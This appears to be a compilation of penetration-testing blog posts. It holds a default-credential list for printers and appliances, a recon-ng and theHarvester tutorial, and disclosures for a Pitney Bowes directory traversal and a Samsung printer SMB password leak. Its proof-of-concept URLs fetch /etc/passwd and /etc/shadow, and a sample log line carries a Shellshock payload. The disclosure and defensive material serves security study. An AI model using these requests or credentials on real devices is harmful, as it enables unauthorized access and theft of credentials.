WebAppPrintSirWEBPORT 1.1adminsu@psir
WebAppPrintSirWEBPORT 1.1admin1234
WebAppRicohAficio SP C811DNadmin
WebAppRicohAficio MP C6000admin
WebAppRicohAficio 2022adminpassword
WebAppSamsungCLX-6250adminsec00000
WebAppSamsungSyncThru Webadminadmin
WebAppSharpMXadminadmin
WebAppSharpARadminSharp
WebAppSharpMX-M363Nadministratoradminhttp://www.lesolsoncompany.com/InstantKB20/KnowledgebaseArticle50144.aspx
WebAppSilexSX-500access
WebAppSpeco TechnologiesWeb Clientadmin1111
WebAppSpectraT50sulook for /gf/startpage.htm
WebAppSymantecEndpoint Protection Manageradminadminhttp://www.symantec.com/connect/forums/endpoint-protection-management-console-credentials-lost
WebAppTandbergRDX quikstationAdminAdmin!case sensitive
WebAppTeradiciPCoIP Zero ClientAdministrator
WebAppWebCTRLWebCTRLadminpassword
WebAppWebCTRLWebCTRLanonymous access
WebAppXeroxWorkCentre 7775admin1111
WebAppXioTechEmprise 5000administratoradministrator
WebAppZebraZebraNetadmin1234
WebAppZebraZTC GK420dadmin1234
WebAppEMC2Cloud Tiering Appliancerootrain
WebAppStratusEverrunadminadmin
WebAppIBMTS7700adminadmin
WebAppCrestonAirmediaadminadmin
WebAppQuantumScaler I40adminpassword
InfrastructureWelch-AllynRETevalrootRETeval-DR 2.5.0
InfrastructureNetAppONTAPadminnetapp!123
WebAppSplunkSplunkadminchangemeport 8000

Creating a Workspace

The workspace is an area that will help keep your reconnaissance organized. Each workspace has its own directory inside the hidden .recon-ng directory in the home directory.

First we will find an organization to recon and build our workspace around this company.  We will use HackerOne to get our company.

This is how Wikipedia describes HackerOne:

“HackerOne is a vulnerability coordination and bug bounty platform that connects businesses with cybersecurity researchers (aka, hackers). It is one of the first companies to embrace and utilize crowd-sourced security and hackers as linchpins of its business model, and is the largest cybersecurity firm of its kind.”

Even though we are only performing reconnaissance in a non-intrusive manner, we will use a company from HackerOne’s Directory.  Under the right conditions, this company has agreed to recon and scanning.  We will only be using recon-ng. Figure 1 shows the company we will use in the tutorial but feel free to select a different company from HackerOne or use any one that you are authorized to test against.

Figure 1: HackerOne Company

Figures 2 and 3 show the scope that is authorized for testing including eligible submissions and domains.

Figure 2: Eligible Items

Figure 3: Allowed Domains

workspaces -h shows us the different options we have available (Figure 4).

Figure 4: Workspace -h

Next we will add our workspace using the following command (Figure 5)

workspaces add
Figure 5: Adding a Workspace

After this command you are automatically placed into your new workspace. workspaces list will show you the status of your workspaces.

Figure 6: List of workspaces

Next, we will add our company and our domain. This will add information to the SQLite database. To add information into the database, we need to understand the schema, the layout of the tables. To look at the schema of the database, run the following command (Figure 7).

show schema
Figure 7: Show Schema

There are thirteen different tables; we will view the schema of the tables we use in this tutorial.

 add companies

Running the add companies command will make the other columns available. Press enter if you want to leave that column blank.

Figure 8: Add Company

Add the domain using the following command (Figure 9).

add domains
Figure 9: Add Domains

To verify that the domain was added successfully run the command shown in Figure 10.

show domains
Figure 10: List Domains

A simple way of thinking about adding to the tables is shown in Figure 11.

Figure 11: Table Visualization

Now that we’ve added data to the database and know how to verify that manually inserted data is correct, let’s move on to importing and exporting data.

Importing Data into the Database

We will use theHarvester to gather information about united.com and import this into recon-ng’s database.

From Edge Security: http://www.edge-security.com/theharvester.php

“The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration Testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.”

If theHarvester isn’t already installed, i.e. you aren’t using Kali Linux, you can clone it from here: https://github.com/laramies/theHarvester

Figure 12: theHarvester

We called theHarvester to gather data on domain united.com using all the data sources listed in the help screen.  We directed the output to my recon-ng folder using the ‘>’ operator. The sample command we used follows:

./theHarvester.py -d united.com -b all > ~/recon-ng/harvester.txt

The file name is harvester.txt. This is an ugly file that we will parse through using a few Linux utilities. Sample results are shown in the next figure.

Figure 13: Sample Results

The next step is to take this output and clean it up a bit with some Linux utilities. We will use grep and AWK to trim the tree.

Grep and AWK

grep is a command-line utility for searching plain-text data sets for lines matching a regular expression.

This is by no means the perfect way.  This is just one of many to get the results you need. Using grep, we will create a list of email addresses from harvester.txt file. (Figure 14)

grep @united.com harvester.txt > united_emails.txt
Figure 14: grep command

If you are interested in the file contents, use the cat command to view them in the terminal.

cat united_emails.txt
Figure 15: cat results

Next, we will create a list of hosts for import from theHarvester results. (Figure 16)

grep ":" harvester.txt
Figure 16: grep host

Grep will also help create the virtual host list. Also take note that since “united.com” is the only domain in scope, it becomes part of the command.

grep ":" harvester.txt | grep united.com

This command was a little harder to figure out. The pattern we wanted to match was “=”, and I didn’t want to count the lines after the pattern exactly, so I chose 200 as the after-context line count (-A200), as shown in Figure 17.

grep -A200 "=" harvester.txt | grep united.com > virtual_hosts.txt

Figure 17: grep for Virtual Hosts
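As an added example, not code from the tutorial, here is a Python equivalent of the three grep commands above: it parses a theHarvester text report into emails, hosts and virtual hosts, de-duplicated and restricted to the in-scope domain with a real suffix match, so `notunited.com` and `united.com.example.net` are rejected where `grep united.com` would let them through. The report text is a constructed sample shaped like the sections the greps rely on (lines containing `@domain`, `host:ip` lines, and virtual-host lines after the `=` separator); the output file names united_emails.txt and virtual_hosts.txt come from the tutorial, united_hosts.txt is my own choice.

```python
"""Added example (not from the tutorial): parse a theHarvester text report into
the three lists the grep chain above produces (emails, hosts, virtual hosts),
de-duplicated and limited to the in-scope domain.

The report text is a constructed sample shaped like the sections the greps
rely on; it is not real theHarvester output for united.com.
"""
import re
from pathlib import Path

SAMPLE_REPORT = """\
[+] Emails found:
------------------
press@united.com
Investor.Relations@united.com
press@united.com
someone@notunited.com

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
www.united.com:192.0.2.10
careers.united.com:192.0.2.11
notunited.com:192.0.2.99
=================================================================
[+] Virtual hosts:
==================
192.0.2.10\twww.united.com
192.0.2.10\tmobile.united.com
192.0.2.12\twww.united.com.example.net
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HOST_RE = re.compile(r"^([A-Za-z0-9.-]+):(\d{1,3}(?:\.\d{1,3}){3})$")
VHOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([A-Za-z0-9.-]+)$")


def in_scope(hostname, domain):
    """True only for the domain itself or a genuine subdomain of it (suffix match on a dot)."""
    h = hostname.lower().rstrip(".")
    return h == domain or h.endswith("." + domain)


def parse_harvester(text, domain):
    """Return {'emails': [...], 'hosts': [...], 'vhosts': [...]}, each sorted and unique."""
    emails, hosts, vhosts = set(), set(), set()
    past_separator = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("="):
            past_separator = True          # the "=" line that `grep -A200 "="` keys on
        for email in EMAIL_RE.findall(line):
            if in_scope(email.rsplit("@", 1)[1], domain):
                emails.add(email.lower())
        m = HOST_RE.match(line)            # "host:ip" lines, what `grep ":"` selected
        if m and in_scope(m.group(1), domain):
            hosts.add(m.group(1).lower())
        m = VHOST_RE.match(line)           # "ip<ws>host" lines after the separator
        if m and past_separator and in_scope(m.group(2), domain):
            vhosts.add(m.group(2).lower())
    return {"emails": sorted(emails), "hosts": sorted(hosts), "vhosts": sorted(vhosts)}


def write_import_files(parsed, outdir):
    """One value per line, the layout recon-ng's import/list module reads."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    names = {"emails": "united_emails.txt",   # name used in the tutorial
             "hosts": "united_hosts.txt",     # assumed name
             "vhosts": "virtual_hosts.txt"}   # name used in the tutorial
    written = {}
    for key, fname in names.items():
        path = outdir / fname
        path.write_text("\n".join(parsed[key]) + "\n")
        written[key] = str(path)
    return written


if __name__ == "__main__":
    import tempfile
    result = parse_harvester(SAMPLE_REPORT, "united.com")
    print(result)
    print(write_import_files(result, tempfile.mkdtemp()))
```

Run it against a saved harvester.txt by reading the file into `parse_harvester`; the scope filter is the part worth keeping even if you stay with grep, since an out-of-scope host that slips into the import is an out-of-scope host you will later scan.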

It is time to import our information into recon-ng.

Using the show modules command, we get a list of modules broken down by category. We will use the import/list module from the Import category.

show modules
Figure 18: Import Modules

The “show info” command shows the options to use and the table and columns that will be needed for the import.

show info
Figure 19: Show Info

To find the column and table, we will use the “show schema” command. This will give us a list of the tables and the columns in each.

show schema
Figure 20: Show Schema

To import email addresses, we will use the “contacts” table and the email column. Our file name will be the united_emails.txt file we created from the theHarvester results. The “set” statements set the variables for the import. The “run” command executes the module.

set TABLE contacts
set COLUMN email
set FILENAME united_emails.txt
run
Figure 21: Email Import

The “show contacts” command shows the data inside the contacts table. This is a second verification that the data imported correctly.

Figure 22: Show Contacts

Part 3: Usage and Reporting

Intro

Recon-ng is an open source reconnaissance framework written in Python. This SQLite database driven tool incorporates Python modules and API keys to allow it to be a conduit for many tools ranging from theHarvester to Metasploit. It is an awesome standalone reconnaissance tool in its own right. As a side note, we all totally have a geeky nerd crush on LaNMaSteR53.

This part of the series will take a look at installation and adding API keys. Later we will show you how to create a workspace, import data into the database, and export data for use with other tools.

For our targets of reconnaissance, we will use HackerOne’s directory of companies. This is not our way of saying “Go out and hack these companies” but our way of doing safe recon and providing consistent screenshots that will be easy to follow. This is also our way of introducing you to HackerOne and the Bug Bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next clone Recon-ng from bitbucket (Figure 1). In this tutorial we clone to the Home directory but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
Figure 1: git install

Next, change directory into the newly created recon-ng and list the contents (Figure 2).

cd recon-ng
ls
Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use; we will go over a little bit of information now while you’re still paying attention and then get recon-ng running and the API keys loaded.

The installation of recon-ng also creates a hidden .recon-ng directory inside your home directory. This directory is initially empty. This is where your keys.db and your workspaces will be created. After running recon-ng for the first time, a workspace directory and the keys.db are created in the hidden .recon-ng directory (Figure 3).


Figure 3: .recon-ng directory

To run recon-ng, go to the folder where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set” error (Figure 4). We have not added any API keys yet.


Figure 4: Initial Start

From our screen we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules. We are also using the “default” workspace (Figure 5).


Figure 5: Recon-ng start screen

Close recon-ng and let’s look at the modules and the underlying code (Figure 6).

cd modules
cd recon
ls

Figure 6: Module Directory

If we go inside the module directory and into a module, we can see the Python script that does all the magic (Figure 7).


Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database-driven tool. Now it’s time to add information to the database.

The API keys are used by the modules to gather information into the SQLite database. Some of the API keys are free but some can be expensive. I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console (Figure 8).

keys list

Figure 8: Keys List

The following command is an example of adding the shodan_api key (bottom of Figure 8; look closely, it is there).

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time-consuming part of the setup. Showing each signup would be lethally boring, so here is the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instagram API – https://www.programmableweb.com/api/instagram
LinkedIn API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/


Part 2: Workspaces and Importing Data

This PowerShell script, written by our friend Rafael Montoya, will allow you to scan open shares based on a list you provide or a subnet you enter. It will process hostnames or IP addresses and attempt to connect to the shares on a machine using WMI to make the connection.

Using PowerShell, it calls Get-WMIObject with the Win32_ConnectionShare class; it can be modified to list more properties. The properties currently listed are PSComputerName, Name, Path and Description.

For use with subnets in CIDR notation, GET-IPRange will currently list the IP addresses in the subnet that was entered. For a /24 it will list all 254 usable addresses and scan those IPs for an SMB share.

The framework is basically a simple interface to these two functions: it asks you to provide a CIDR range or a file and, depending on which one you pick, runs the proper command to get the shares. The script writes the results to a separate file that you have to specify; it appends to that file and writes only the shares it finds.

All the code you need is here: GitHub

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and Twitter, we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was finding out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure, and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious, it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb
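As an added example (not Pitney Bowes’ code and not part of the advisory), here is why the encoded path above escapes the document root, and how a server-side path check should handle it: decode once, normalise, and refuse anything that resolves outside the configured root. The web root /var/www and the function names are assumptions made for the example.

```python
"""Added example, not Pitney Bowes code: how the encoded traversal above escapes
the web root, and a containment check that stops it."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumed document root (constructed for this example)

# The request path from the advisory, as it arrives on the wire.
TRAVERSAL = "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"


def blocked_by_raw_filter(url_path: str) -> bool:
    """A filter that looks for '../' in the raw path never sees it when the
    slashes are percent-encoded, so the request sails through."""
    return "../" in url_path


def naive_resolve(url_path: str) -> str:
    """The vulnerable pattern: decode, append to the root, and let path
    normalisation collapse the '..' components. Ten '..' climb well past
    /var/www, so the result is the real /etc/passwd."""
    return posixpath.normpath(WEB_ROOT + unquote(url_path))


def safe_resolve(url_path: str) -> Optional[str]:
    """Decode exactly once, normalise, then require the result to stay
    under WEB_ROOT. Returns None for anything that must be refused."""
    decoded = unquote(url_path)
    if "%" in decoded:
        # A second layer of encoding is an attempt to get the decode-then-check
        # order wrong; refuse rather than decode again.
        return None
    # Anchor under the root before normalising so '..' is resolved relative
    # to WEB_ROOT and a climb above it is visible, not silently dropped at '/'.
    candidate = posixpath.normpath(WEB_ROOT + "/" + decoded.lstrip("/"))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    # A production server should also os.path.realpath() the candidate so a
    # symlink inside the root cannot point outside it.
    return candidate
```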

About a year ago, during a network penetration test, I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious: NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester, but luckily the connection was slow enough that I watched the page load briefly and then redirect to the next page. This definitely highlights the importance of manual testing.

Because this has been responsibly disclosed and patched it isn’t technically a 0day.

The firmware fixing the vulnerability was released over six months ago, and I didn’t want to publish any vulnerability information irresponsibly. The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version: 2.01.00.26
Network Firmware Version: V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version: 1.20.73
UI Firmware Version: V1.03.01.55 07-13-2009
Finisher Firmware Version: Not Installed
PCL5E Firmware Version: PCL5e 5.87 11-07-2008
PCL6 Firmware Version: PCL6 5.86 10-28-2008
PostScript Firmware Version: PS3 V1.93.06 12-19-2008
SPL Firmware Version: SPL 5.32 01-03-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Samsung SCX-5635 Series
Main Firmware Version: 2.01.01.18 12-08-2009
Network Firmware Version: V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version: 1.31.32
PCL5E Firmware Version: PCL5e 5.92 02-12-2009
PCL6 Firmware Version: PCL6 5.93 03-21-2009
PostScript Firmware Version: PS3 1.94.06 12-22-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file, access http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.

Have you ever manually tested the Glassfish Authentication Bypass (CVE Details)? What about manually testing it on 40+ servers while dealing with indecisive people patching systems on the fly? I had that wonderful opportunity while running tests for a federal agency.

After all the headache and bureaucracy, I wrote a quick python program just to test for that specific case of verb tampering.

Time passed…and I switched jobs. During the interim, I spent a lot of time thinking about web verbs and what I could use them for as a penetration tester. Web verb tampering is on OWASP’s list but doesn’t seem to get the same amount of attention that the different types of injections command.

What this led to was Verbinator. Verbinator tests web verbs and cases. Lots of web verbs. I found all of the RFC-specified verbs plus some others used mostly by Microsoft. All of the RFC numbers and verbs are in the source if you’re interested. As a bonus, you can also cram some random text in for the verb, because web servers absolutely LOVE unexpected input. While reading return data is barrels of fun, I also added a differential ability to show whether the response changed when the web verb case was altered.

If you have any questions, comments, or ideas for improving the program, please let me know.

This is a direct collaboration with Doofenshmirtz Evil Incorporated; all work is subject to platypus attack.

**********
Source (just rename it to .py): verbinator
Basic usage:

 

I was able to use the bash shellshock vulnerability last week to manually find a vulnerability in a web server through the HTTP User-agent. If you can do something manually there is a good chance that it can be done programmatically. This python program is an extension of that belief.

This program has three simple parts: an ICMP network listener, a urllib2 HTTP request generator, and a simple parser that displays the results. Why ICMP? 5 ping packets generated from a vulnerable server should not be a huge burden. Isn’t urllib2 pretty dated? It really is, but it ignores SSL certificate issues so I didn’t have to handle HTTPS requests differently from the HTTP requests.

This isn’t weaponized at all. It could be weaponized fairly easily, but that is up to you, and we don’t recommend testing it against any address that you aren’t authorized to use. Metasploitable2 has a shellshock User-agent vulnerability if you want to test this on a controlled network.

Usage – python shellshockUAScanner.py -r <CIDR range> -t <number of threads *default is 16> -i <interface *default is eth0>

shellshockUAScanner – source code
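Both Verbinator (verb and case tampering) and the scanner above (a Shellshock payload in the User-Agent) leave a distinctive shape in a web server’s access log. As an added example that is not part of either tool, the following detection logic runs over a few constructed combined-format log lines and flags both: requests whose User-Agent starts with the bash function-export prefix, and clients that hit one path with unexpected verb spellings, noting when the server answered those spellings differently. The log format, the expected-method set and the sample lines are assumptions.

```python
"""Added example (not the Verbinator or shellshockUAScanner code): scan access
logs for the two request shapes those tools generate, so a defender can spot
verb tampering and Shellshock probes arriving in the User-Agent."""
import re
from collections import defaultdict

# Apache/nginx "combined" format, assumed for the constructed sample below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Bash function-export prefix every CVE-2014-6271 payload has to start with.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Methods the (hypothetical) application actually serves; anything else is odd.
EXPECTED_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}

# Constructed sample: one Shellshock probe and one client fuzzing verb case.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/ping -c 5 203.0.113.5"',
    '198.51.100.9 - - [10/Oct/2014:13:56:01 +0000] "GET /admin/ HTTP/1.1" 403 128 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2014:13:56:02 +0000] "get /admin/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2014:13:56:03 +0000] "Get /admin/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2014:13:56:04 +0000] "FOOBAR /admin/ HTTP/1.1" 501 0 "-" "Mozilla/5.0"',
    '198.51.100.10 - - [10/Oct/2014:13:57:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(lines):
    """(ip, path) for every request whose User-Agent carries the prefix."""
    return [(r["ip"], r["path"]) for r in map(parse, lines)
            if r and SHELLSHOCK_RE.search(r["ua"])]


def find_verb_tampering(lines):
    """Report clients sending unexpected verb spellings to a path. Methods are
    case-sensitive, so a status that differs between spellings means the server
    treats them differently, which is what a verb-tampering tool hunts for."""
    seen = defaultdict(dict)  # (ip, path) -> {method spelling: status}
    for r in filter(None, map(parse, lines)):
        seen[(r["ip"], r["path"])][r["method"]] = r["status"]
    findings = []
    for (ip, path), methods in seen.items():
        odd = sorted(m for m in methods if m not in EXPECTED_METHODS)
        if odd:
            findings.append({"ip": ip, "path": path, "odd_methods": odd,
                             "status_differs": len(set(methods.values())) > 1})
    return findings
```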